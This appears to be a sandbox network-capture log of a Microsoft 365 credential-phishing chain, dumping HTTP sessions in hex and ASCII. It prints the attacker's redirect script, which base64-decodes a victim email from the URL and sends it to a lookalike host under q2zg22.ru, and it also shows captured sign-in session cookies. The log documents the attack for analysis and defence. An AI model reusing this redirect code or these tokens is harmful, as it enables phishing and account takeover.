                                                                                                                          Set-Cookie: TCSESSION=20240202201741992404317; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCREDIRECT=1; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          Set-Cookie: TCREDIRECT_DEDUP=1; path=/; domain=sushishop.commander1.com; secure; SameSite=None
                                                                                                                          location: //galeonconstruction.com/nin/niit
                                                                                                                          Server: web
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          2024-02-02 19:17:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.2.1649760162.241.124.474435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:49 UTC674OUTGET /nin/niit/ HTTP/1.1
                                                                                                                          Host: galeonconstruction.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:50 UTC159INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:49 GMT
                                                                                                                          Server: Apache
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          2024-02-02 19:17:50 UTC239INData Raw: 65 34 0d 0a 3c 73 63 72 69 70 74 3e 20 0a 20 0a 76 61 72 20 65 6d 61 69 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 28 31 29 3b 76 61 72 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 20 3d 20 61 74 6f 62 28 65 6d 61 69 6c 29 3b 20 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 73 6f 66 74 2d 64 32 76 6b 62 6d 76 7a 77 7a 67 66 2e 71 32 7a 67 32 32 2e 72 75 2f 6d 61 69 6c 2f 69 6e 62 6f 78 2f 23 27 20 2b 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 3b 20 7d 29 3b 20 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: e4<script> var email = window.location.hash.substr(1);var decodedString = atob(email); window.setTimeout(function() {window.location.href = 'https://microsoft-d2vkbmvzwzgf.q2zg22.ru/mail/inbox/#' + decodedString; }); </script>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.2.1649761172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:50 UTC1852OUTPOST /cdn-cgi/challenge-platform/h/b/jsd/r/84f4c6c0cc52672b HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 17071
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Content-Type: application/json
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://office.q2zg22.ru
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8
                                                                                                                          2024-02-02 19:17:50 UTC16384OUTData Raw: 7b 22 77 70 22 3a 22 55 6f 7a 74 75 62 45 72 75 53 7a 75 57 2b 64 45 76 45 36 41 34 74 62 42 41 33 58 41 59 5a 59 6a 6a 62 72 45 56 68 41 6b 4a 42 49 4a 73 7a 41 31 6b 48 4b 64 4a 53 45 6c 41 57 76 7a 4e 6d 6f 6f 41 33 2d 6a 41 52 41 6a 42 6a 7a 45 41 24 6a 45 65 64 4f 74 2d 53 6f 30 66 37 74 6b 4a 6e 6f 58 33 35 6c 36 2b 4e 61 74 65 6e 75 77 58 67 45 35 68 6b 2d 59 41 75 7a 7a 44 59 31 62 30 6d 41 79 4e 6d 73 38 30 41 38 74 2b 31 41 62 77 7a 41 59 74 62 62 74 6e 57 74 59 41 45 4a 41 34 53 78 41 45 67 30 41 54 46 72 33 4e 6f 48 45 33 2d 6d 7a 41 62 46 30 41 62 64 4b 34 41 4b 62 41 45 30 24 73 69 7a 37 6c 58 42 62 4e 62 45 38 65 58 6f 68 75 6e 50 70 38 6b 41 5a 74 62 59 32 63 6f 41 72 78 6f 4a 2b 73 6b 43 24 4e 41 4b 70 38 2d 6e 5a 33 74 41 69 2d 5a 73 59
                                                                                                                          Data Ascii: {"wp":"UoztubEruSzuW+dEvE6A4tbBA3XAYZYjjbrEVhAkJBIJszA1kHKdJSElAWvzNmooA3-jARAjBjzEA$jEedOt-So0f7tkJnoX35l6+NatenuwXgE5hk-YAuzzDY1b0mAyNms80A8t+1AbwzAYtbbtnWtYAEJA4SxAEg0ATFr3NoHE3-mzAbF0AbdK4AKbAE0$siz7lXBbNbE8eXohunPp8kAZtbY2coArxoJ+skC$NAKp8-nZ3tAi-ZsY
                                                                                                                          2024-02-02 19:17:50 UTC687OUTData Raw: 6f 41 4c 62 51 41 68 53 41 55 7a 6f 69 53 7a 62 63 45 65 6a 6b 38 45 35 4f 24 74 70 38 75 78 45 32 66 24 74 4e 38 41 4f 38 72 6a 41 55 73 76 74 52 6d 75 45 41 64 41 24 74 75 74 41 46 69 68 53 41 6b 41 6a 75 33 49 56 6b 74 31 41 24 65 75 48 41 55 74 33 30 41 78 74 69 6a 53 7a 45 37 6a 75 59 33 57 33 78 41 44 41 7a 63 42 52 45 61 6d 6a 7a 2b 6b 58 6e 7a 41 4a 2d 67 41 7a 38 55 4b 62 68 4a 6c 6a 70 38 45 31 45 51 41 6b 4d 4a 6e 6f 70 4a 68 53 75 63 48 69 41 45 41 2b 24 48 44 74 52 6d 2b 30 69 54 41 54 6a 4e 52 74 43 41 68 69 2b 77 7a 45 41 63 74 45 52 41 75 63 6b 38 41 38 41 4f 38 34 24 4e 53 41 6c 6a 73 4a 45 54 41 46 69 33 57 45 37 6e 76 74 63 74 41 66 48 56 51 52 7a 45 54 41 58 6a 6a 6a 75 2d 45 62 6a 34 24 2b 30 69 4a 41 49 6b 33 44 41 61 41 24 74 62 31
                                                                                                                          Data Ascii: oALbQAhSAUzoiSzbcEejk8E5O$tp8uxE2f$tN8AO8rjAUsvtRmuEAdA$tutAFihSAkAju3IVkt1A$euHAUt30AxtijSzE7juY3W3xADAzcBREamjz+kXnzAJ-gAz8UKbhJljp8E1EQAkMJnopJhSucHiAEA+$HDtRm+0iTATjNRtCAhi+wzEActERAuck8A8AO84$NSAljsJETAFi3WE7nvtctAfHVQRzETAXjjju-Ebj4$+0iJAIk3DAaA$tb1
                                                                                                                          2024-02-02 19:17:50 UTC816INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:50 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; path=/; expires=Sat, 01-Feb-25 19:17:50 GMT; domain=.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=61IM1tjFNC1ALHWKlXcSjmWF11mYE3UwXPFGdaBpM31AuIB1ShZHflMLGzjmlIviCoZmJFfqJLP71%2FZUMM71MC3oSxOzdMo9BJSQzq5ZtsKlKRuQg1jbjQ%2B0OxUyDF%2FDSF03"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6cc5f7617f3-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.2.1649733104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:50 UTC997OUTGET /mail/inbox/ HTTP/1.1
                                                                                                                          Host: microsoft-d2vkbmvzwzgf.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=ce0oW76mtANxPk_4kyc3mBk42cWWnIOKaijg4RusDUc-1706901468-1-AeslQiFkGHYQohQV1EPcN2JU227xaAZFWW3gC7kcE9vFnxHvJuY8AnBotsMwex+qA7cxzTMhs69XAR33CiBa1pk=
                                                                                                                          2024-02-02 19:17:50 UTC700INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:50 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Location: https://office.q2zg22.ru/
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fybNqnQM8B2dnqiwJUhJdKtGtmtjCXBB9cPWD0dFe10h7U0Ppb86kocOp31dCtDwDXDd5nxiLjWoIgFJLgULVLVP7JVub%2FfwWe25u1Du6ECNUzqnCrYbHRl6FC4b%2BScMmCei87%2BnjraCXR7s3iKxQwB0pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6cd1f324587-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.2.1649762152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:50 UTC642OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:50 UTC628INHTTP/1.1 200 OK
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 1034387
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: EuPayFgGHQiAI7K9SOL6lg==
                                                                                                                          Content-Type: image/x-icon
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:50 GMT
                                                                                                                          Etag: 0x8D8731240E548EB
                                                                                                                          Last-Modified: Sun, 18 Oct 2020 03:02:30 GMT
                                                                                                                          Server: ECAcc (aga/87AE)
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 38f7f91a-801e-00d7-3da4-4cbf4e000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 17174
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:50 UTC15774INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                          Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                          2024-02-02 19:17:50 UTC1400INData Raw: 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 99 99 99 99 99 99 99 70 03 33 33 33 33 33 33 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa aa aa aa aa aa aa
                                                                                                                          Data Ascii: 3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333p3333333


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.2.1649763152.199.4.444435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:50 UTC611OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_6a0a7b7c69bd86706a39.js HTTP/1.1
                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:50 UTC750INHTTP/1.1 200 OK
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Age: 2414435
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-MD5: ZeQH0cIatjmBJ7hqKoBn0Q==
                                                                                                                          Content-Type: application/x-javascript
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:50 GMT
                                                                                                                          Etag: 0x8DC0CDF85D41F36
                                                                                                                          Last-Modified: Thu, 04 Jan 2024 04:42:14 GMT
                                                                                                                          Server: ECAcc (aga/8779)
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Cache: HIT
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-request-id: 74440df0-701e-0044-3416-40253f000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          Content-Length: 156896
                                                                                                                          Connection: close
                                                                                                                          2024-02-02 19:17:50 UTC16383INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                          2024-02-02 19:17:50 UTC1INData Raw: 65
                                                                                                                          Data Ascii: e
                                                                                                                          2024-02-02 19:17:50 UTC16383INData Raw: 74 75 72 6e 21 31 7d 7d 2c 75 2e 63 6f 6e 63 61 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 6f 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 22 6c 69 73 74 22 20 61 72 67 75 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 61 6e 20 41 72 72 61 79 20 6f 66 20 42 75 66 66 65 72 73 27 29 3b 69 66 28 30 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 75 2e 61 6c 6c 6f 63 28 30 29 3b 76 61 72 20 72 3b 69 66 28 74 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 66 6f 72 28 74 3d 30 2c 72 3d 30 3b 72 3c 65 2e 6c 65 6e 67 74 68 3b 2b 2b 72 29 74 2b 3d 65 5b 72 5d 2e 6c 65 6e 67 74 68 3b 76 61 72 20 6e 3d 75 2e 61 6c 6c 6f 63 55 6e 73 61 66 65 28 74 29 2c 69 3d 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 65 2e 6c 65 6e 67 74 68 3b 2b 2b
                                                                                                                          Data Ascii: turn!1}},u.concat=function(e,t){if(!o(e))throw new TypeError('"list" argument must be an Array of Buffers');if(0===e.length)return u.alloc(0);var r;if(t===undefined)for(t=0,r=0;r<e.length;++r)t+=e[r].length;var n=u.allocUnsafe(t),i=0;for(r=0;r<e.length;++
                                                                                                                          2024-02-02 19:17:50 UTC16383INData Raw: 5d 3d 76 6f 69 64 20 30 3b 76 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 28 72 3d 65 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 7c 7c 74 68 69 73 29 2e 74 79 70 65 3d 22 61 74 72 75 6c 65 22 2c 72 7d 72 3d 65 2c 28 74 3d 6e 29 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 72 2e 70 72 6f 74 6f 74 79 70 65 29 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 74 2c 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 72 3b 76 61 72 20 69 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 69 2e 61 70 70 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 74 68 69 73 2e 6e 6f 64 65 73 7c 7c 28 74 68
                                                                                                                          Data Ascii: ]=void 0;var i=function(e){var t,r;function n(t){var r;return(r=e.call(this,t)||this).type="atrule",r}r=e,(t=n).prototype=Object.create(r.prototype),t.prototype.constructor=t,t.__proto__=r;var i=n.prototype;return i.append=function(){var t;this.nodes||(th
                                                                                                                          2024-02-02 19:17:50 UTC16383INData Raw: 6e 6f 64 65 73 5b 65 5d 29 2e 72 65 76 65 72 73 65 28 29 2c 69 3d 6e 2c 6f 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 69 29 2c 73 3d 30 3b 66 6f 72 28 69 3d 6f 3f 69 3a 69 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 3b 29 7b 76 61 72 20 61 3b 69 66 28 6f 29 7b 69 66 28 73 3e 3d 69 2e 6c 65 6e 67 74 68 29 62 72 65 61 6b 3b 61 3d 69 5b 73 2b 2b 5d 7d 65 6c 73 65 7b 69 66 28 28 73 3d 69 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 62 72 65 61 6b 3b 61 3d 73 2e 76 61 6c 75 65 7d 76 61 72 20 75 3d 61 3b 74 68 69 73 2e 6e 6f 64 65 73 2e 73 70 6c 69 63 65 28 65 2b 31 2c 30 2c 75 29 7d 66 6f 72 28 76 61 72 20 63 20 69 6e 20 74 68 69 73 2e 69 6e 64 65 78 65 73 29 65 3c 28 72 3d 74 68 69 73 2e 69 6e 64 65 78 65 73 5b 63 5d 29 26 26 28 74 68 69 73 2e
                                                                                                                          Data Ascii: nodes[e]).reverse(),i=n,o=Array.isArray(i),s=0;for(i=o?i:i[Symbol.iterator]();;){var a;if(o){if(s>=i.length)break;a=i[s++]}else{if((s=i.next()).done)break;a=s.value}var u=a;this.nodes.splice(e+1,0,u)}for(var c in this.indexes)e<(r=this.indexes[c])&&(this.
                                                                                                                          2024-02-02 19:17:50 UTC16383INData Raw: 2e 61 64 64 28 6e 29 29 2c 6e 75 6c 6c 21 3d 6f 26 26 28 6f 3d 53 74 72 69 6e 67 28 6f 29 2c 74 68 69 73 2e 5f 6e 61 6d 65 73 2e 68 61 73 28 6f 29 7c 7c 74 68 69 73 2e 5f 6e 61 6d 65 73 2e 61 64 64 28 6f 29 29 2c 74 68 69 73 2e 5f 6d 61 70 70 69 6e 67 73 2e 61 64 64 28 7b 67 65 6e 65 72 61 74 65 64 4c 69 6e 65 3a 74 2e 6c 69 6e 65 2c 67 65 6e 65 72 61 74 65 64 43 6f 6c 75 6d 6e 3a 74 2e 63 6f 6c 75 6d 6e 2c 6f 72 69 67 69 6e 61 6c 4c 69 6e 65 3a 6e 75 6c 6c 21 3d 72 26 26 72 2e 6c 69 6e 65 2c 6f 72 69 67 69 6e 61 6c 43 6f 6c 75 6d 6e 3a 6e 75 6c 6c 21 3d 72 26 26 72 2e 63 6f 6c 75 6d 6e 2c 73 6f 75 72 63 65 3a 6e 2c 6e 61 6d 65 3a 6f 7d 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 53 6f 75 72 63 65 43 6f 6e 74 65 6e 74 3d 66 75 6e 63 74 69 6f 6e
